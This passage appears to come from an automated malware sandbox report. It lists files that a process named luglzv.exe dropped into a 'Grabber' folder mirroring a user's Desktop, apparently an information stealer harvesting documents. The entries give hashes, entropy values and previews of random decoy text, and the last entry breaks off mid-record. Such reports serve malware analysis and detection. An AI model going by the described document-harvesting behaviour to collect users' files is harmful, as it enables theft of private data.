                                                                  Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\KATAXZVCPS.docx

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699548026888946
                                                                  Encrypted:false
                                                                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                  Malicious:false
                                                                  Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\KATAXZVCPS.jpg

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699548026888946
                                                                  Encrypted:false
                                                                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                  Malicious:true
                                                                  Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\KATAXZVCPS.xlsx

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699548026888946
                                                                  Encrypted:false
                                                                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                  Malicious:false
                                                                  Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\KATAXZVCPS\KATAXZVCPS.docx

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699548026888946
                                                                  Encrypted:false
                                                                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                  Malicious:false
                                                                  Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\KATAXZVCPS\LTKMYBSEYZ.xlsx

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.687722658485212
                                                                  Encrypted:false
                                                                  SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                  MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                  SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                  SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                  SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                  Malicious:false
                                                                  Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\KATAXZVCPS\RAYHIWGKDI.png

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.69782189124949
                                                                  Encrypted:false
                                                                  SSDEEP:24:Ejrsjf7MixEleswsyrKNRsfqDG97h9JFQttKZUsgd:AruwiCl9RyrKzDGvFothJd
                                                                  MD5:0640503E533EFB11CC70F43D2FFF4E26
                                                                  SHA1:EEACB5C334E23451DEF6DF7B1DBC836F8D5DC7F1
                                                                  SHA-256:F1E1D526371BA959E03143C250244912FE0B9C0002FB521B35EBF6B303A45240
                                                                  SHA-512:10A6184DE66D8DCFB784A4CADD010433A6E64B5C2BBDE73C5E804CB9C4A1DD42589D5B3F81004548BD4F4B48CDEC5E59F703C6E1CC91052578C191B0420B3F20
                                                                  Malicious:false
                                                                  Preview:RAYHIWGKDIRTARQYQWOBCGSCZTUKIHKHGIDMMEQIAQREXBEXSICMBOCZGGWHBLUMCKDMBQEITRPKYTMYLFIYWQOJESATZEPWZIOXPWBQZTJXLAJZABRWIVUBVJFSNDCHMUKOSZLAGXHWLJOZTOGXVRCKZUWMQJXXEBALSHWQQWMZSSNQPYAVMCOWPGIQXROQBVBCHGZFDUPLKTFJZFLPQAZUSOCBPSHUJTOHHLCAJMVXHEMQRTWBFOCSIQLCVPUVRLGBXUQDWIUHVAEKDXVYQFLOJKPUTQAUYMMBEAALRHWXLPSGJQAXQEKMLZIZODFPAFRSSEYDMLJMRHMTAAIXEFUIILJKVGEZOYKKWEPVJQVNYFFYKRTQETFXFNAJIKRVPASKSGPKFCKZPAWWPVZRALMCBKRDOEIBIKKTHQIKXETYHIXFIDXRTNRQTJUYJKPFSYLHGPQHDQCLEGRHMOWEKRHPYXHYBEJRWKNVHYVSFWCDDPTNQKIIPYEUERDNPUHTABOGALJFLNCHFVUUXYWKPWLFGSGGMLBJNUKSZDRMWINHKUODGVGUBXUFJZPIOPPUJJYPIYBSMFJDODMOMNHZLFGXCLRVZWGCTYATVPBVTSKSTKWSAFNJQHUTMYXATQBLVEOPUSEAHMLQDLRSJXGJWRUIJXFKGYOEOWEZOSKCJPIVESIUXOBETKSWFUVRRKSLBTDFQSCFNKQERIRRRREBLOQVLIDYLYKYFMCQBLBQTNJMMMKSVARWYDTJAARNVMOUPHYNYYQMCBERSBXMHXDBNYDZXQLRKYTIFDCWTEPNQGQDWHEMKECWRJGPESGZBVSBOMTJRUQQIBGIJFHOYKRJHNKMSSTEXXZGWSIGMLAJNJNUENSYJRBGUJKNETIMQHONDPCBMBYBIBNOHNJQYWEOHOCGOHXGWYYBPTHRZNFMHKEAHSEPDNXXSDYRREJULDTKDSLQABJKBZDQSIPXTUMOMUNOTGBAJQSBTRFIGSLC

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\KATAXZVCPS\YPSIACHYXW.pdf

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.700014595314478
                                                                  Encrypted:false
                                                                  SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                                  MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                                  SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                                  SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                                  SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                  Malicious:false
                                                                  Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\KATAXZVCPS\ZBEDCJPBEY.jpg

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.6994061563025005
                                                                  Encrypted:false
                                                                  SSDEEP:24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
                                                                  MD5:A2EF8D31A8DC8EAFB642142CAE0BDDE5
                                                                  SHA1:6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
                                                                  SHA-256:A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
                                                                  SHA-512:0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
                                                                  Malicious:false
                                                                  Preview:ZBEDCJPBEYDZQGCVTGMBDASCMXWLERZBJTKXMSCERSGFDONQAMYGDFYKFYLRRNDSSGOWCSVJIWIVRJNDSQXJTTMAXVCSRDVBHJTJAHTUGCUAWHWEVTZMXBFFYFUVEYDCLBXZZXFGQTWOJCECEYXZGEOOJDMVGMJIBYUFGTAXZQFDALIISPEXNBMVCNQHJOUZVXMSFGVMMJSOTYBAIBARXRQIHGTHEJLHLQYVFLCLOFZPJJNGWGUFEFWDITXPCXBOEGYNGVEMPRSJBIUABRWYDIZIOEKFMGKERRXNEAUHHIGKJGZYYHOPIKNRRYEAZLMNYDGFIVIJPYMXKETIZCKXHUZFXIJHQQDRCSLMJZZJXMQYZJYWLCENOBYZRKIPDNTOCZBITNJXYFHPKLDLFNFTFPITPPGJYNAUOBLGWYVHPFDVDMRFKRTPDBLSNIHQBPMARNFKQAQJVIEOLDVNQKQXMHUIECHHCBWWKMSQPKKMTKTWVWEBVUAXWNLNMYEUBMGCGJTOJRQFGGHHLUDCSUNVREFGQLVZNTOMRGHSGVZCIEDGKHHTKATGJQYWMOXACOPMCHXJXNTBTSGCPUUSQVNCDVHCIQKUJWVUTGDNGWDNLQEWLMNYLKNVSFDBBIZZEHCDIMOJGCOBQZDWJNJPIEFNVWHFQSCSHGUQLBIQCMTBTOMPFZRCNWPIJILMFSCYXDRTMSMAVJZZGQJTZZACHQUIBTKCMOKJBPDOKJYCHADHETFJAVZAQIIWZRRGFSBGIIPYXFQSZKQPWXQCYERZGATQXEDAHDYBYZVROOBTIZFDOMRDVIUBHXTQOKCVSRLAYYMSBYFDGLRDCLXUKSNRGYDRFKSMAJGRBMDZLACAAKDZLPQZCVGELWTWVKPXDEMWCSQNQCJWQNLMOGJVDBANJWFKRRBFXUWVSMZLFJYCUJJORXEFPORKQLYKBMUOVWZKWNAHBCKBBJIYVVDQNIPFQZUTPFKYIRDTGOBWONUYXDVC

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\LTKMYBSEYZ.xlsx

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.687722658485212
                                                                  Encrypted:false
                                                                  SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                  MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                  SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                  SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                  SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                  Malicious:false
                                                                  Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\NWTVCDUMOB.jpg

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.696250160603532
                                                                  Encrypted:false
